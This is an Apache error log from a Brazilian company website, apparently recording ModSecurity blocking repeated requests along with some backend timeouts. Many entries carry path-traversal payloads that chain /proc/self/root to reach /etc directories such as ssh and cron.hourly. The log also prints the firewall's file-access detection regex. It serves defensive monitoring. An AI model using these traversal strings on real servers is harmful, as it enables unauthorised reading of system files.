[Thu Mar 19 02:30:23.418295 2026] [:error] [pid 19093:tid 140411649607424] [client 74.7.241.31:38742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJ71_V7PWP6ixUYl53zwAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:30:27.947864 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:47230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJ8wkwaGbbGflqUZBt8gAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:30:33.483174 2026] [:error] [pid 19093:tid 140411607643904] [client 74.7.241.31:47236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJ-V_V7PWP6ixUYl530AAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:30:37.109853 2026] [proxy_fcgi:error] [pid 19093:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56730] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:30:58.791972 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.244.43:49950] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuKEgbLMZ6AikZjR9UZUAAAAA4"]
[Thu Mar 19 02:31:02.157776 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57250] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:31:07.619524 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:43104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuKG_u8EFLIOrSqIptYDAAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:31:12.415629 2026] [:error] [pid 27293:tid 140411741927168] [client 74.7.241.31:55398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuKH_-YZRR_7pZ7nDJJ-gAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:31:22.505549 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:55400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuKKgkwaGbbGflqUZBuGAAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:31:26.157806 2026] [proxy_fcgi:error] [pid 19093:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57856] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:31:33.684578 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:43812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuKNQkwaGbbGflqUZBuIAAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:31:50.125840 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58456] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:31:56.585222 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.241.31:47730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuKTAbLMZ6AikZjR9UZdQAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:32:13.125783 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59072] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:32:36.093911 2026] [proxy_fcgi:error] [pid 19093:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59620] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:32:59.117032 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60152] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:33:23.173892 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60776] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:33:32.679303 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.228.61:33700] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuKrOoXxyEfFpUF8f_OsgAAAUc"]
[Thu Mar 19 02:33:45.130961 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33074] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:34:07.133261 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33542] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:34:31.148056 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:34028] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:34:55.029783 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34506] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:35:19.117842 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35050] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:35:44.461782 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35572] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:35:51.767431 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.244.43:56432] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuLNwbLMZ6AikZjR9UZ9wAAABI"]
[Thu Mar 19 02:36:08.053840 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36160] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:36:32.117897 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36690] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:36:39.623478 2026] [mime_magic:error] [pid 26799:tid 140411632822016] (70014)End of file found: [client 57.141.18.9:38778] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:36:57.133809 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37284] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:37:07.147574 2026] [:error] [pid 27403:tid 140411616036608] [client 74.7.241.31:33144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuLgxkFeYa1D6dYQnCpTQAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:37:19.041810 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37828] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:37:36.038791 2026] [mime_magic:error] [pid 14269:tid 140411565680384] (70014)End of file found: [client 57.141.18.99:40396] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:37:43.121594 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:38380] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:38:08.137848 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39012] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:38:32.121799 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:39678] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:38:35.560217 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.228.61:44380] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuL2ta6ubjKNq_cu4b4rAAAA08"]
[Thu Mar 19 02:38:35.566091 2026] [:error] [pid 19093:tid 140411599251200] [client 74.7.243.128:38836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuL21_V7PWP6ixUYl546gAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:38:42.484955 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:35570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuL4gkwaGbbGflqUZBvKgAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:38:46.599234 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.241.31:36846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuL5v-YZRR_7pZ7nDJKtQAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:38:54.122400 2026] [proxy_fcgi:error] [pid 31803:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:40234] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:39:03.003244 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.241.31:52258] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuL9wkwaGbbGflqUZBvPwAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:39:13.259570 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.241.31:40136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuMAfu8EFLIOrSqIptZPQAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:39:14.735923 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:46234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuMAuyqAr6etmhZHNohZAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:39:17.126404 2026] [proxy_fcgi:error] [pid 19093:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40754] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:39:30.465773 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.241.31:46140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuMEgkwaGbbGflqUZBvUwAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:39:41.050060 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41280] AH01075: Error dispatching request to : (polling)
